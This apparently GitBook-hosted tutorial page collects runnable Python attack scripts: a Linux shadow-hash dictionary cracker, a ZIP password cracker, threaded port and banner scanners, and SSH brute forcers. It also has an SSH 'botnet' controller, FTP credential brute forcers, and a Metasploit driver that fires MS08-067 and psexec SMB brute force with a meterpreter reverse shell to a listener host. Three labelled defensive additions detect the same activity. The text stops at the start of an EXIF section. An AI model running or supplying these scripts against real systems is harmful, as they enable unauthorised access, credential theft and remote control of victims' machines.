Powered by GitBook
Scripts covered in a certain tutorial

1. Cracking Linux passwords

# encoding: utf-8
import crypt


def testpass(cryptpass):
    # Salt: the text from the first "$" up to (not including) the last "$",
    # e.g. "$6$somesalt" for a SHA-512 entry
    salt = cryptpass[cryptpass.find("$"):cryptpass.rfind("$")]
    # Read the wordlist
    dictfile = open('dictionary.txt', 'r')
    # Hash every candidate with the salt and compare it to the stored hash
    for word in dictfile.readlines():
        word = word.strip('\n')     # drop the trailing newline
        # Hash the candidate together with the salt
        cryptword = crypt.crypt(word, salt)
        # Compare the computed hash with the stored one
        if cryptword == cryptpass:
            print("[+] found password: " + word + "\n")
            return
    print("[-] password not found.\n")
    return


def main():
    # Read the file holding the Linux password entries
    passfile = open('mima.txt')
    # Crack each entry in turn
    for line in passfile.readlines():
        # Entries are ":"-separated
        if ":" in line:
            # The field before the first ":" is the user name
            user = line.split(':')[0]
            # The field between the first and second ":" is the hashed password
            cryptpass = line.split(':')[1].strip()
            print("[*] cracking password for: " + user)
            # Crack it
            testpass(cryptpass)


if __name__ == "__main__":
    main()
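The script above only tests candidate words against one hash. From the defending side, the more useful check on the same `user:hash` material is whether the stored hashes are worth protecting at all: which algorithm each entry uses, whether any account has an empty password, and whether a salt is shared between accounts. The following is an added example, not part of the tutorial; it parses shadow-style lines and classifies them by their `$id$` prefix without calling `crypt` at all. The sample entries and their hash strings are constructed placeholders, and the "acceptable algorithm" table is this example's assumption, following common hardening guidance.

```python
import re

# Hash-id prefix -> (algorithm name, acceptable today). The classification is
# this example's assumption, following common hardening guidance, not the page's.
HASH_IDS = {
    "1": ("md5crypt", False),
    "2a": ("bcrypt", True), "2b": ("bcrypt", True), "2y": ("bcrypt", True),
    "5": ("sha256crypt", True),
    "6": ("sha512crypt", True),
    "7": ("scrypt", True),
    "y": ("yescrypt", True),
    "gy": ("gost-yescrypt", True),
}

# Constructed shadow-style sample; the hash/salt strings are placeholders, not real hashes.
SAMPLE_SHADOW = """\
root:$6$Xa9u1Kq2$placeholderhashA:19500:0:99999:7:::
alice:$1$saltmd5$placeholderhashB:19500:0:99999:7:::
bob:aB3def1GhIjKl:19500:0:99999:7:::
carol:$y$j9T$saltvalue$placeholderhashC:19500:0:99999:7:::
dave::19500:0:99999:7:::
daemon:*:19500:0:99999:7:::
eve:$6$Xa9u1Kq2$placeholderhashD:19500:0:99999:7:::
"""

def classify_hash(field):
    """Return (algorithm, salt, acceptable) for one shadow password field."""
    if field == "":
        return ("empty", "", False)
    if field.startswith(("!", "*")):
        return ("locked", "", True)       # no password login possible
    if field.startswith("$"):
        parts = field.split("$")          # "$6$salt$hash" -> ['', '6', 'salt', 'hash']
        hid = parts[1]
        algo, ok = HASH_IDS.get(hid, ("unknown", False))
        if hid.startswith("2"):
            salt = parts[3][:22] if len(parts) > 3 else ""   # bcrypt: cost, then salt+hash
        elif hid in ("7", "y", "gy"):
            salt = parts[3] if len(parts) > 4 else ""        # a params field precedes the salt
        else:
            salt = parts[2] if len(parts) > 3 else ""
        return (algo, salt, ok)
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):
        return ("descrypt", field[:2], False)   # traditional DES: 2-char salt, 8-char password limit
    return ("unknown", "", False)

def audit_shadow(shadow_text):
    """Map user -> (algorithm, findings) for every entry in a shadow-format text."""
    results = {}
    salts = {}
    for line in shadow_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        user, pwfield = fields[0], fields[1]
        algo, salt, ok = classify_hash(pwfield)
        findings = []
        if algo == "empty":
            findings.append("empty-password")
        elif algo == "unknown":
            findings.append("unknown-format")
        elif not ok:
            findings.append("weak-algorithm")
        if salt:
            salts.setdefault(salt, []).append(user)
        results[user] = (algo, findings)
    # Two accounts sharing a salt let one pass over a wordlist test both at once
    for salt, users in salts.items():
        if len(users) > 1:
            for u in users:
                results[u][1].append("salt-reuse")
    return results

if __name__ == "__main__":
    for user, (algo, findings) in audit_shadow(SAMPLE_SHADOW).items():
        print("%-8s %-14s %s" % (user, algo, ", ".join(findings) or "ok"))
```

Run as-is it prints one line per account; on a real system feed it the contents of `/etc/shadow` (root only). The salt-reuse check is exactly the property the tutorial's cracker relies on: every candidate word is hashed once per salt, so a shared salt halves the attacker's work.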

2. Cracking zip file passwords

First look at the zipfile library

# encoding: utf-8

import zipfile

# Open the archive
zfile = zipfile.ZipFile("test.zip")

try:
    # Extract with the correct password (pwd must be bytes)
    zfile.extractall(pwd=b"123456")
except Exception as e:
    print(e)

Password cracking with the extractall function

# encoding: utf-8

import sys
import zipfile

zfile = zipfile.ZipFile("test.zip")
# Open the wordlist
passfile = open('dictionary.txt')
# Walk the wordlist line by line
for line in passfile.readlines():
    # Each line, minus its trailing newline, is a candidate password
    password = line.strip('\n')
    try:
        # Try to extract the archive with this password
        zfile.extractall(pwd=password.encode())
        # Extraction succeeded, so print the password
        print('[+] password = ' + password + '\n')
        sys.exit(0)
    # A wrong password raises an exception; move on to the next candidate
    except Exception:
        pass

Refactored into functions

# encoding: utf-8

import sys
import zipfile

# Extraction helper, so the script is split into functions
def extractfile(zfile, password):
    try:
        # Try to extract; return the password on success, otherwise an exception is raised
        zfile.extractall(pwd=password.encode())
        return password
    except Exception:
        return None

def main():
    # Open the archive
    zfile = zipfile.ZipFile('test.zip')
    # Open the wordlist
    passfile = open('pass.txt')
    # Try every password in the wordlist
    for line in passfile.readlines():
        password = line.strip('\n')
        # Call the extraction helper
        guess = extractfile(zfile, password)

        if guess:   # a truthy guess means extraction worked: print the password
            print('[+] password = ' + password + '\n')
            sys.exit(0)

if __name__ == "__main__":
    main()

3. Port scanner

# encoding: utf-8

import sys
import optparse
# Create the parser
parser = optparse.OptionParser('usage %prog -H <target host> -p <target ports>')
# Command-line options we need
parser.add_option('-H', dest='host', type='string', help='specify target host')
parser.add_option('-p', dest='ports', type='string', help='specify target ports')

# Parse the command line
(options, args) = parser.parse_args()
# Pull out the option values (check for None before str() turns it into 'None')
host = options.host
if host is None or options.ports is None:
    print(parser.usage)
    sys.exit(0)
ports = str(options.ports).split(',')

# encoding: utf-8

import optparse
# Use the socket library
from socket import *

def connscan(host, port):
    try:
        # Create the socket
        connskt = socket(AF_INET, SOCK_STREAM)
        # Connect to the target port; on success report it as open
        connskt.connect((host, port))
        print('[+] %d/tcp open' % port)
        # Close the connection
        connskt.close()

    except Exception:
        # Connection failed: report the port as closed
        print('[-] %d/tcp closed' % port)

def portscan(host, ports):
    try:
        # Resolve the target to an IP address
        ip = gethostbyname(host)

    except Exception:
        # Resolution failed: report it and stop
        print("[-] cannot resolve '%s': unknown host" % host)
        return

    try:
        # Look up the target's host name
        name = gethostbyaddr(ip)
        print('\n[+] scan results for: ' + name[0])

    except Exception:
        # No host name available: show the IP instead
        print('\n[+] scan results for: ' + ip)
    # Default connection timeout
    setdefaulttimeout(1)
    # Walk the port list
    for port in ports:
        print('scanning port ' + port)
        # Call the connect function with this one port (not the whole list)
        connscan(host, int(port))

# encoding: utf-8

import sys
import optparse
from socket import *

def connscan(host, port):
    try:
        connskt = socket(AF_INET, SOCK_STREAM)
        connskt.connect((host, port))
        # Send a string to the open port
        connskt.send(b'quiet simple\r\n')
        # Receive whatever the service replies
        results = connskt.recv(100)
        print('[+] %d/tcp open' % port)
        # Print the reply (banner)
        print('[+] ' + str(results))
        connskt.close()
    except Exception:
        print('[-] %d/tcp closed' % port)

def portscan(host, ports):
    try:
        ip = gethostbyname(host)
    except Exception:
        print("[-] cannot resolve '%s': unknown host" % host)
        return
    try:
        name = gethostbyaddr(ip)
        print('\n[+] scan results for: ' + name[0])
    except Exception:
        print('\n[+] scan results for: ' + ip)
    setdefaulttimeout(1)
    for port in ports:
        print('scanning port ' + port)
        connscan(host, int(port))

def main():
    parser = optparse.OptionParser('usage %prog -H <target host> -p <target ports>')
    parser.add_option('-H', dest='host', type='string', help='specify target host')
    parser.add_option('-p', dest='ports', type='string', help='specify target ports')
    (options, args) = parser.parse_args()
    host = options.host
    if host is None or options.ports is None:
        print(parser.usage)
        sys.exit(0)
    ports = str(options.ports).split(',')
    # Run the scan
    portscan(host, ports)

if __name__ == "__main__":
    main()

# encoding: utf-8

import sys
import optparse
from socket import *
from threading import *

# Semaphore used as a lock so threads do not interleave their output
screenlock = Semaphore(value=1)

def connscan(host, port):
    try:
        connskt = socket(AF_INET, SOCK_STREAM)
        connskt.connect((host, port))
        connskt.send(b'quiet simple\r\n')
        results = connskt.recv(100)
        connskt.close()
        status = '[+] %d/tcp open\n[+] %s' % (port, results)
    except Exception:
        status = '[-] %d/tcp closed' % port
    # Take the lock only while printing, and release it in finally
    screenlock.acquire()
    try:
        print(status)
    finally:
        screenlock.release()

def portscan(host, ports):
    try:
        ip = gethostbyname(host)
    except Exception:
        print("[-] cannot resolve '%s': unknown host" % host)
        return
    try:
        name = gethostbyaddr(ip)
        print('\n[+] scan results for: ' + name[0])
    except Exception:
        print('\n[+] scan results for: ' + ip)
    setdefaulttimeout(1)
    for port in ports:
        print('scanning port ' + port)
        # One thread per port, so the timeouts run in parallel
        t = Thread(target=connscan, args=(host, int(port)))
        t.start()

def main():
    parser = optparse.OptionParser('usage %prog -H <target host> -p <target ports>')
    parser.add_option('-H', dest='host', type='string', help='specify target host')
    parser.add_option('-p', dest='ports', type='string', help='specify target ports')
    (options, args) = parser.parse_args()
    host = options.host
    if host is None or options.ports is None:
        print(parser.usage)
        sys.exit(0)
    ports = str(options.ports).split(',')
    portscan(host, ports)

if __name__ == "__main__":
    main()
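A connect scanner like the one above leaves a very recognisable trace on the target side: one source touching many distinct ports on one host within a few seconds, most of the attempts refused. The following added example (not part of the tutorial) applies that rule to connection log lines using a sliding time window per source/destination pair. The `src=... dst=... dport=... action=...` line format and the sample lines are constructed, and the window length and port-count thresholds are assumptions to tune per environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample connection log (hypothetical format: one line per TCP
# connection attempt, as a perimeter firewall or flow exporter might write it).
SAMPLE_LOG = [
    "2024-05-01T10:00:00 src=10.0.0.5 dst=10.0.0.20 dport=21 action=deny",
    "2024-05-01T10:00:01 src=10.0.0.5 dst=10.0.0.20 dport=22 action=allow",
    "2024-05-01T10:00:02 src=10.0.0.5 dst=10.0.0.20 dport=23 action=deny",
    "2024-05-01T10:00:03 src=10.0.0.5 dst=10.0.0.20 dport=25 action=deny",
    "2024-05-01T10:00:04 src=10.0.0.5 dst=10.0.0.20 dport=80 action=allow",
    "2024-05-01T10:00:05 src=10.0.0.5 dst=10.0.0.20 dport=443 action=allow",
    "2024-05-01T10:00:06 src=10.0.0.5 dst=10.0.0.20 dport=445 action=deny",
    "2024-05-01T10:00:07 src=10.0.0.5 dst=10.0.0.20 dport=8080 action=deny",
    # A normal client: the same two ports, spread over minutes
    "2024-05-01T10:00:00 src=10.0.0.9 dst=10.0.0.20 dport=80 action=allow",
    "2024-05-01T10:01:30 src=10.0.0.9 dst=10.0.0.20 dport=443 action=allow",
    "2024-05-01T10:03:00 src=10.0.0.9 dst=10.0.0.20 dport=80 action=allow",
    "this line is not in the expected format",
]

LOG_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) action=(?P<action>\S+)$"
)

def parse_line(line):
    """Parse one log line; return None for lines that do not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return (datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["dport"]), m["action"])

def detect_port_scans(lines, window_seconds=10, min_ports=6):
    """Flag (src, dst) pairs where src touched >= min_ports distinct ports within window_seconds."""
    events = [e for e in map(parse_line, lines) if e is not None]
    events.sort(key=lambda e: e[0])          # logs are not always in time order
    recent = defaultdict(deque)              # (src, dst) -> deque of (ts, dport) inside the window
    alerts = {}
    for ts, src, dst, dport, action in events:
        key = (src, dst)
        q = recent[key]
        q.append((ts, dport))
        # Drop events that fell out of the sliding window
        while q and (ts - q[0][0]).total_seconds() > window_seconds:
            q.popleft()
        distinct = {p for _, p in q}
        # Raise one alert per pair, at the moment the threshold is first crossed
        if len(distinct) >= min_ports and key not in alerts:
            alerts[key] = {"first_seen": q[0][0], "last_seen": ts, "ports": sorted(distinct)}
    return alerts

if __name__ == "__main__":
    for (src, dst), info in detect_port_scans(SAMPLE_LOG).items():
        print("[!] %s scanned %s: %d ports between %s and %s" % (
            src, dst, len(info["ports"]), info["first_seen"], info["last_seen"]))
```

The alert is keyed on the source/destination pair, so a slow scan that spreads the same ports over many hosts would need a second rule keyed on source alone; the banner string the scanner sends (`quiet simple`) is also worth a content signature on services that log their first received bytes.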

4. Building an SSH botnet

# encoding: utf-8

# Third-party library
import pexpect
# Shell prompt patterns
PROMPT = ['#', '>>>', '>', '\$']
# Send a command
def send_command(child, cmd):
    child.sendline(cmd)
    # Wait for the prompt to come back
    child.expect(PROMPT)
    # Print the output received from the SSH session (bytes in Python 3)
    print(child.before.decode(errors='replace'))

# Connect function
def connect(user, host, password):
    ssh_newkey = 'are you sure you want to continue connecting'
    # Connection string
    connstr = 'ssh ' + user + '@' + host
    # Spawn the connection
    child = pexpect.spawn(connstr)
    # Wait for the host-key question, a password prompt, or a timeout
    ret = child.expect([pexpect.TIMEOUT, ssh_newkey, '[P|p]assword: '])
    # Act on what was matched
    if ret == 0:
        print('[-] error connecting')
        return
    if ret == 1:
        child.sendline('yes')
        ret = child.expect([pexpect.TIMEOUT, ssh_newkey, '[P|p]assword: '])
        if ret == 0:
            print('[-] error connecting')
            return
    # Send the password
    child.sendline(password)
    # Wait for the shell prompt
    child.expect(PROMPT)
    return child

def main():
    host = 'localhost'
    user = 'root'
    password = 'simple123'
    # SSH connection
    child = connect(user, host, password)
    # Send a command
    send_command(child, 'ls /root/')

if __name__ == "__main__":
    main()

# encoding: utf-8

import sys
# pxssh library
from pexpect import pxssh
# optparse library
import optparse
# time library
import time
# threading library
from threading import *

# Maximum number of concurrent connections
maxconnections = 5
# Connection semaphore
connection_lock = BoundedSemaphore(value=maxconnections)
found = False
fails = 0

# Connect function
def connect(host, user, password, release):
    # Globals
    global found
    global fails
    try:
        # Create the session object
        s = pxssh.pxssh()
        # SSH login
        s.login(host, user, password)
        # Login succeeded: print the password
        print('[+] password found: ' + password)
        found = True
    except Exception as e:
        # Inspect the error and retry where appropriate
        if 'read_nonblocking' in str(e):
            fails += 1
            time.sleep(5)
            connect(host, user, password, False)
        elif 'synchronize with original prompt' in str(e):
            time.sleep(1)
            connect(host, user, password, False)
    finally:
        # Release the semaphore
        if release:
            connection_lock.release()

def main():
    # Create the parser
    parser = optparse.OptionParser('usage %prog -H <target host> -u <user> -F <password list>')
    # Define the options
    parser.add_option('-H', dest='host', type='string', help='specify target host')
    parser.add_option('-F', dest='passwordfile', type='string', help='specify password file')
    parser.add_option('-u', dest='user', type='string', help='specify the user')
    # Parse the command line
    (options, args) = parser.parse_args()
    # Read the option values
    host = options.host
    passwordfile = options.passwordfile
    user = options.user
    if host is None or passwordfile is None or user is None:
        print(parser.usage)
        sys.exit(0)
    # Open the password list (the file named by -F, not the literal string)
    fn = open(passwordfile, 'r')
    # Try each password
    for line in fn.readlines():
        if found:
            print("[*] exiting: password found")
            sys.exit(0)
        if fails > 5:
            print("[*] exiting: too many socket timeouts")
            sys.exit(0)
        # Acquire the semaphore
        connection_lock.acquire()
        password = line.strip('\n')
        print("[-] testing: " + str(password))
        # Start a thread for this attempt
        t = Thread(target=connect, args=(host, user, password, True))
        t.start()

if __name__ == "__main__":
    main()

# encoding: utf-8

from pexpect import pxssh

class Client:
    # Initialise the object
    def __init__(self, host, user, password):
        self.host = host
        self.user = user
        self.password = password
        self.session = self.connect()
    # SSH connection
    def connect(self):
        try:
            s = pxssh.pxssh()
            s.login(self.host, self.user, self.password)
            return s
        except Exception as e:
            print(e)
            print('[-] error connecting')
    # Send a command
    def send_command(self, cmd):
        self.session.sendline(cmd)
        self.session.prompt()
        return self.session.before.decode(errors='replace')

# Send a command to every host in the botnet
def botnetcommand(command):
    for client in botnet:
        output = client.send_command(command)
        print('[*] output from ' + client.host)
        print('[+] ' + output)

# Create a Client object and record it
def addclient(host, user, password):
    client = Client(host, user, password)
    botnet.append(client)

# List of Client objects
botnet = []
addclient('127.0.0.1', 'root', 'simplexue123')
addclient('127.0.0.1', 'root', 'simplexue123')
addclient('127.0.0.1', 'root', 'simplexue123')

botnetcommand('uname -v')
botnetcommand('ls /root')
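The pxssh brute forcer and the botnet client above both show up in the target's sshd log as a run of `Failed password` lines from one source, sometimes followed by an `Accepted` line for the same user. The following added example (not the tutorial's code) parses sshd-style auth log lines, counts failures per source and per user name, and flags a success that follows a burst of failures, which is the event worth paging on rather than the failures alone. The sample lines, host name and PIDs are constructed, and the failure threshold is an assumption.

```python
import re
from collections import defaultdict

# Constructed sshd auth log lines in syslog style (hypothetical host and PIDs).
SAMPLE_AUTH_LOG = [
    "May  1 10:00:01 bastion sshd[2101]: Failed password for root from 10.0.0.5 port 51234 ssh2",
    "May  1 10:00:02 bastion sshd[2103]: Failed password for root from 10.0.0.5 port 51236 ssh2",
    "May  1 10:00:03 bastion sshd[2105]: Failed password for root from 10.0.0.5 port 51238 ssh2",
    "May  1 10:00:04 bastion sshd[2107]: Failed password for root from 10.0.0.5 port 51240 ssh2",
    "May  1 10:00:05 bastion sshd[2109]: Failed password for root from 10.0.0.5 port 51242 ssh2",
    "May  1 10:00:06 bastion sshd[2111]: Failed password for root from 10.0.0.5 port 51244 ssh2",
    "May  1 10:00:07 bastion sshd[2113]: Accepted password for root from 10.0.0.5 port 51246 ssh2",
    "May  1 10:00:08 bastion sshd[2115]: Failed password for invalid user admin from 10.0.0.7 port 40001 ssh2",
    "May  1 10:00:09 bastion sshd[2117]: Failed password for invalid user admin from 10.0.0.7 port 40002 ssh2",
    "May  1 10:00:10 bastion sshd[2119]: Failed password for invalid user test from 10.0.0.7 port 40003 ssh2",
    "May  1 10:00:11 bastion sshd[2121]: Failed password for invalid user oracle from 10.0.0.7 port 40004 ssh2",
    "May  1 10:00:12 bastion sshd[2123]: Failed password for invalid user oracle from 10.0.0.7 port 40005 ssh2",
    # A legitimate user who mistyped once and then used a key
    "May  1 10:05:00 bastion sshd[2200]: Failed password for alice from 10.0.0.9 port 50001 ssh2",
    "May  1 10:05:05 bastion sshd[2202]: Accepted publickey for alice from 10.0.0.9 port 50002 ssh2",
]

FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+")
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted \S+ for (?P<user>\S+) from (?P<src>\S+) port \d+")

def _new_entry():
    return {"failed": 0, "users": set(), "accepted": [], "success_after_failures": False}

def analyze_sshd_log(lines, threshold=5):
    """Return per-source stats for sources that crossed the failure threshold
    or logged in after a burst of failures."""
    stats = defaultdict(_new_entry)
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            entry = stats[m["src"]]
            entry["failed"] += 1
            entry["users"].add(m["user"])
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            entry = stats[m["src"]]
            entry["accepted"].append(m["user"])
            # Success preceded by >= threshold failures from the same source
            if entry["failed"] >= threshold:
                entry["success_after_failures"] = True
    return {src: e for src, e in stats.items()
            if e["failed"] >= threshold or e["success_after_failures"]}

if __name__ == "__main__":
    for src, e in analyze_sshd_log(SAMPLE_AUTH_LOG).items():
        tag = "COMPROMISE?" if e["success_after_failures"] else "brute force"
        print("[!] %s: %d failures for %s (%s)" % (src, e["failed"], sorted(e["users"]), tag))
```

The counter is per source, which matches the tutorial's single-host brute forcer; a credential-stuffing run spread over many sources needs the same count keyed on the user name instead.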

5. FTP password scanning and web page search

# encoding: utf-8

# ftplib library
import ftplib

# Check whether the target allows anonymous login
def anonlogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        # Anonymous login
        ftp.login('anonymous', 'me@youer.com')
        print('\n[*] ' + str(hostname) + ' FTP anonymous login succeeded')
        ftp.quit()
        return True
    except Exception:
        print('\n[-] ' + str(hostname) + ' FTP anonymous logon failed.')
        return False

host = '192.168.1.3'
anonlogin(host)

# encoding: utf-8

import ftplib

# Brute-force FTP credentials from a user:password file
def brutelogin(hostname, passwdfile):
    pf = open(passwdfile, 'r')
    # Try to log in to the target FTP server with each credential pair
    for line in pf.readlines():
        user = line.split(':')[0]
        p = line.split(':')[1].strip('\n')
        print('[+] trying: ' + user + ': ' + p)
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(user, p)
            print('\n[*] ' + str(hostname) + ' FTP login succeeded: ' + user + ':' + p)
            ftp.quit()
            return (user, p)
        except Exception:
            pass
    print('\n[-] could not brute force ftp credentials.')
    return (None, None)

host = '192.168.1.3'
passwdfile = 'pass.txt'
brutelogin(host, passwdfile)

# encoding: utf-8

import ftplib

# Find default web pages
def returndefault(ftp):
    try:
        # List the FTP directory
        dirlist = ftp.nlst()
    except Exception:
        dirlist = []
        print('[-] could not list directory contents')
        print('[-] skipping to next target')
        return
    # List of default pages found
    retlist = []
    for filename in dirlist:
        fn = filename.lower()
        # Look for file names with particular extensions
        if '.php' in fn or '.htm' in fn or '.asp' in fn:
            print('[+] found default page: ' + filename)
            retlist.append(filename)
    # Return after the whole listing has been checked, not on the first match
    return retlist

host = '192.168.1.3'
username = 'administrator'
password = '123456'
# Open the FTP connection
ftp = ftplib.FTP(host)
ftp.login(username, password)
returndefault(ftp)

# encoding: utf-8

import sys
import ftplib
import optparse

# Anonymous login
def anonlogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login('anonymous', 'me@youer.com')
        print('\n[*] ' + str(hostname) + ' FTP anonymous login succeeded')
        ftp.quit()
        return True
    except Exception:
        print('\n[-] ' + str(hostname) + ' FTP anonymous logon failed.')
        return False

# Credential brute force
def brutelogin(hostname, passwdfile):
    pf = open(passwdfile, 'r')
    for line in pf.readlines():
        user = line.split(':')[0]
        p = line.split(':')[1].strip('\n')
        print('[+] trying: ' + user + ': ' + p)
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(user, p)
            print('\n[*] ' + str(hostname) + ' FTP login succeeded: ' + user + ':' + p)
            ftp.quit()
            return (user, p)
        except Exception:
            pass
    print('\n[-] could not brute force ftp credentials.')
    return (None, None)

# Find default web pages
def returndefault(ftp):
    try:
        dirlist = ftp.nlst()
    except Exception:
        dirlist = []
        print('[-] could not list directory contents')
        print('[-] skipping to next target')
        return
    retlist = []
    for filename in dirlist:
        fn = filename.lower()
        if '.php' in fn or '.htm' in fn or '.asp' in fn:
            print('[+] found default page: ' + filename)
            retlist.append(filename)
    return retlist

def main():
    parser = optparse.OptionParser('usage %prog -H <target host[s]> [-f <userpass file>]')
    parser.add_option('-H', dest='thost', type='string', help='specify target host')
    parser.add_option('-f', dest='passwdfile', type='string', help='specify user/password file')
    (options, args) = parser.parse_args()
    thost = options.thost
    passwdfile = options.passwdfile
    if thost is None:
        print(parser.usage)
        sys.exit(0)
    username = None
    password = None
    # Try anonymous login first
    if anonlogin(thost) == True:
        username = 'administrator'
        password = '123456'
        ftp = ftplib.FTP(thost)
        ftp.login(username, password)
        returndefault(ftp)
    # Otherwise try the credential list
    elif passwdfile is not None:
        (username, password) = brutelogin(thost, passwdfile)
        ftp = ftplib.FTP(thost)
        ftp.login(username, password)
        returndefault(ftp)

if __name__ == "__main__":
    main()

6. Interacting with Metasploit from a Python script

# encoding: utf-8

# python-nmap library
import nmap

def findtarget(subnet):
    # Create the scanner
    nmscan = nmap.PortScanner()
    # Scan the subnet for hosts with port 445 open and return them as a list
    nmscan.scan(subnet, '445')
    targets = []
    for t in nmscan.all_hosts():
        if nmscan[t].has_tcp(445):
            state = nmscan[t]['tcp'][445]['state']
            if state == 'open':
                print('[+] found target host: ' + t)
                targets.append(t)
    return targets

# encoding: utf-8

# Listener for the sessions coming back from the targets
def setuphandler(configfile, lhost, lport):
    # Module used to receive the sessions
    configfile.write('use exploit/multi/handler\n')
    # Payload, address and port
    configfile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
    configfile.write('set LPORT ' + str(lport) + '\n')
    configfile.write('set LHOST ' + lhost + '\n')
    configfile.write('exploit -j -z\n')
    # Do not start a new handler for every exploit
    configfile.write('setg DisablePayloadHandler 1\n')

# encoding: utf-8

# Exploit module (named confickerexploit, as the main function calls it)
def confickerexploit(configfile, target, lhost, lport):
    # Exploit module
    configfile.write('use exploit/windows/smb/ms08_067_netapi\n')
    # Options
    configfile.write('set RHOST ' + str(target) + '\n')
    configfile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
    configfile.write('set LPORT ' + str(lport) + '\n')
    configfile.write('set LHOST ' + lhost + '\n')
    # Run it
    configfile.write('exploit -j -z\n')

# encoding: utf-8

# SMB brute force
def smbbrute(configfile, target, passwdfile, lhost, lport):
    username = 'Administrator'
    passwdfile = open(passwdfile, 'r')
    # Queue one psexec attempt per password in the list (the writes belong inside the loop)
    for password in passwdfile.readlines():
        password = password.strip()
        configfile.write('use exploit/windows/smb/psexec\n')
        configfile.write('set SMBUser ' + str(username) + '\n')
        configfile.write('set SMBPass ' + str(password) + '\n')
        configfile.write('set RHOST ' + str(target) + '\n')
        configfile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
        configfile.write('set LPORT ' + str(lport) + '\n')
        configfile.write('set LHOST ' + lhost + '\n')
        configfile.write('exploit -j -z\n')

# encoding: utf-8

import os
import optparse
import sys
import nmap

# Use nmap to find hosts with port 445 open
def findtarget(subnet):
    # Create the scanner
    nmscan = nmap.PortScanner()
    nmscan.scan(subnet, '445')
    targets = []
    for t in nmscan.all_hosts():
        if nmscan[t].has_tcp(445):
            state = nmscan[t]['tcp'][445]['state']
            if state == 'open':
                print('[+] found target host: ' + t)
                targets.append(t)
    return targets

# Listener for the sessions coming back from the targets
def setuphandler(configfile, lhost, lport):
    configfile.write('use exploit/multi/handler\n')
    configfile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
    configfile.write('set LPORT ' + str(lport) + '\n')
    configfile.write('set LHOST ' + lhost + '\n')
    configfile.write('exploit -j -z\n')
    configfile.write('setg DisablePayloadHandler 1\n')

# Exploit module
def confickerexploit(configfile, target, lhost, lport):
    configfile.write('use exploit/windows/smb/ms08_067_netapi\n')
    configfile.write('set RHOST ' + str(target) + '\n')
    configfile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
    configfile.write('set LPORT ' + str(lport) + '\n')
    configfile.write('set LHOST ' + lhost + '\n')
    configfile.write('exploit -j -z\n')

# SMB brute force
def smbbrute(configfile, target, passwdfile, lhost, lport):
    username = 'Administrator'
    passwdfile = open(passwdfile, 'r')
    for password in passwdfile.readlines():
        password = password.strip()
        configfile.write('use exploit/windows/smb/psexec\n')
        configfile.write('set SMBUser ' + str(username) + '\n')
        configfile.write('set SMBPass ' + str(password) + '\n')
        configfile.write('set RHOST ' + str(target) + '\n')
        configfile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
        configfile.write('set LPORT ' + str(lport) + '\n')
        configfile.write('set LHOST ' + lhost + '\n')
        configfile.write('exploit -j -z\n')

def main():
    # Open the resource file for writing
    configfile = open('meta.rc', 'w')
    parser = optparse.OptionParser('[-] usage %prog -H <RHOST[s]> -l <LHOST> [-p <LPORT> -F <password file>]')
    parser.add_option('-H', dest='target', type='string', help='specify the target address[es]')
    parser.add_option('-p', dest='lport', type='string', help='specify the listen port')
    parser.add_option('-l', dest='lhost', type='string', help='specify the listen address')
    parser.add_option('-F', dest='passwdfile', type='string', help='password file for SMB brute force attempt')
    (options, args) = parser.parse_args()
    if options.target is None or options.lhost is None:
        print(parser.usage)
        sys.exit(0)
    lhost = options.lhost
    lport = options.lport
    if lport is None:
        lport = '2333'
    passwdfile = options.passwdfile
    # Find targets
    targets = findtarget(options.target)
    setuphandler(configfile, lhost, lport)
    # Attack each target in turn
    for target in targets:
        confickerexploit(configfile, target, lhost, lport)
        if passwdfile is not None:
            smbbrute(configfile, target, passwdfile, lhost, lport)
    configfile.close()
    # Start Metasploit with the resource file
    os.system('msfconsole -r meta.rc')

if __name__ == "__main__":
    main()

7. Inspecting Recycle Bin contents

# encoding: utf-8

import os

def returndir():
    dirs = ['C:\\Recycler\\', 'C:\\Recycled\\', 'C:\\Recycle.Bin\\']
    for recycledir in dirs:
        if os.path.isdir(recycledir):
            return recycledir
    # Only give up after every candidate has been checked
    return None

print(returndir())

# encoding: utf-8

# Registry library
from winreg import *

# Look up the user name the registry records for a SID
def sid2user(sid):
    try:
        key = OpenKey(HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" + '\\' + sid)
        (value, type) = QueryValueEx(key, 'ProfileImagePath')
        user = value.split('\\')[-1]
        return user
    except Exception:
        return sid

# encoding: utf-8

import os
from winreg import *

def sid2user(sid):
    try:
        key = OpenKey(HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" + '\\' + sid)
        (value, type) = QueryValueEx(key, 'ProfileImagePath')
        user = value.split('\\')[-1]
        return user
    except Exception:
        return sid

def returndir():
    dirs = ['C:\\Recycler\\', 'C:\\Recycled\\', 'C:\\Recycle.Bin\\']
    for recycledir in dirs:
        if os.path.isdir(recycledir):
            return recycledir
    return None

def findrecycled(recycledir):
    dirlist = os.listdir(recycledir)
    for sid in dirlist:
        files = os.listdir(recycledir + sid)
        user = sid2user(sid)
        print('\n[*] listing files for user: ' + str(user))
        for file in files:
            print('[+] found file: ' + str(file))

def main():
    recycledir = returndir()
    findrecycled(recycledir)

if __name__ == "__main__":
    main()

8. Reading file EXIF metadata

# encoding: utf-8

import urllib.request
# Required library
from bs4 import BeautifulSoup

